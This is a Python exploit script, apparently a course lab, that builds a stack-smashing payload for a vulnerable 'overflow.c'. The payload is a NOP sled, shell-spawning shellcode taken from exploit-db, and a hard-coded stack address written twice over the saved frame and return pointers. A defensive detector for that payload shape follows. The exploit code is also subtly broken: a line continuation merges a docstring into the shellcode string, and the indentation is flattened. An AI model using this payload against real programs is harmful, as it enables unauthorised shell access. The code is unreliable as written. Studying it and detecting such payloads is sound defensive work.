exploit.py
"""
exploit.py - generates a payload to exploit overflow.c
tested under Kali Linux, 32-bit executable
"""
import struct
# in x86, this is a machine code instruction that does nothing
NOP = '\x90'
def lpad_nop(s, n):
"""
Pad the string up to length n by appending NOP instructions to the
beginning
"""
return (NOP * (n - len(s))) + s
# the address of the "name" buffer
name_address = 0xffffd600
# convert the address int to its 4-byte representation, little endian
address_bytes = struct.pack('<I', name_address)
# the distance on the stack from the start of the name buffer to
# the stored base pointer
offset = 264
# this machine code should open a shell; we got it from
# https://www.exploit-db.com. you can also play around with generating your own
# shellcode using the msfvenom tool (part of the metasploit framework)
shellcode = "\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68" \
"\x90\x90\x90\x68\x58\xc1\xe8\x10\xc1" \
"\xe8\x08\x50\x68\x2f\x64\x61\x73\x68" \
"\x2f\x62\x69\x6e\x89\xe3\x31\xc0\xb0" \
"\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80" \
"""
The payload consists of the shellcode, padded to <offset> bytes, plus
the address of our buffer, which will overwrite the stored base
pointer and the stored return pointer (it is important that we overwrite
the frame pointer with a valid address so that the program doesn't segfault
when returning). When the stored return pointer is loaded into the program
counter, execution control will jump to the address of the name buffer,
and begin executing our shellcode, hopefully getting us a shell
"""
payload = lpad_nop(shellcode, offset) + address_bytes*2
# write out the payload to a file, so we can input it to the program. i,e:
# "cat payload - | ./overflow"
with open('payload', 'wb') as f:
f.write(payload)
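The payload layout described in the docstring above (a NOP sled in front of the code, then the saved frame pointer and return address both overwritten with one stack address) has a recognisable shape. The following is an added example, not part of the original exploit.py or the overflow.c project, showing how a defender can flag that shape in captured input: it looks for a long run of 0x90 bytes, a trailing 4-byte little-endian value repeated twice that falls in the 32-bit stack region, and a low share of printable characters. The stack range `STACK_LO`/`STACK_HI` and the `min_sled` threshold are assumptions to tune per environment, and both sample inputs are constructed here.

```python
"""
Added example: a detector for the stack-smash payload shape built above.
Not part of the original exploit.py. Thresholds and the stack range are
assumptions; the sample inputs are constructed.
"""
import struct

NOP = 0x90
# Assumed range of the 32-bit Linux user stack (tune to the target)
STACK_LO, STACK_HI = 0xbf000000, 0xffffffff


def longest_nop_run(data):
    """Return (start, length) of the longest run of NOP (0x90) bytes."""
    best_start, best_len = 0, 0
    i = 0
    while i < len(data):
        if data[i] == NOP:
            j = i
            while j < len(data) and data[j] == NOP:
                j += 1
            if j - i > best_len:
                best_start, best_len = i, j - i
            i = j
        else:
            i += 1
    return best_start, best_len


def trailing_stack_pointer(data):
    """If the last 8 bytes are one little-endian u32 repeated twice and it
    lies in the stack range (saved EBP and return address both overwritten
    with the same address), return that address; otherwise None."""
    if len(data) < 8:
        return None
    a, b = struct.unpack('<II', data[-8:])
    if a == b and STACK_LO <= a <= STACK_HI:
        return a
    return None


def printable_ratio(data):
    """Share of bytes that are printable ASCII or common whitespace."""
    if not data:
        return 1.0
    printable = sum(1 for c in data if 32 <= c < 127 or c in (9, 10, 13))
    return printable / len(data)


def assess(data, min_sled=16):
    """Combine the three heuristics into one verdict for a captured input."""
    start, length = longest_nop_run(data)
    ptr = trailing_stack_pointer(data)
    ratio = printable_ratio(data)
    return {
        'nop_sled': length >= min_sled,
        'sled_start': start,
        'sled_len': length,
        'stack_ptr': ptr,
        'printable_ratio': round(ratio, 2),
        'suspicious': length >= min_sled or ptr is not None or ratio < 0.5,
    }


# Constructed samples: a normal name, and a payload with the same layout as
# exploit.py but with filler bytes in place of the shellcode
BENIGN = b'Alice Example\n'
SUSPICIOUS = b'\x90' * 200 + b'A' * 64 + struct.pack('<I', 0xffffd600) * 2

if __name__ == '__main__':
    for label, sample in (('benign', BENIGN), ('suspicious', SUSPICIOUS)):
        print(label, assess(sample))
```

Run it over the bytes a program actually received (for example a captured stdin file) rather than over the exploit script itself; the three checks are independent, so a payload that avoids one of them (no sled, a pointer that differs in its two copies) is still caught by the others.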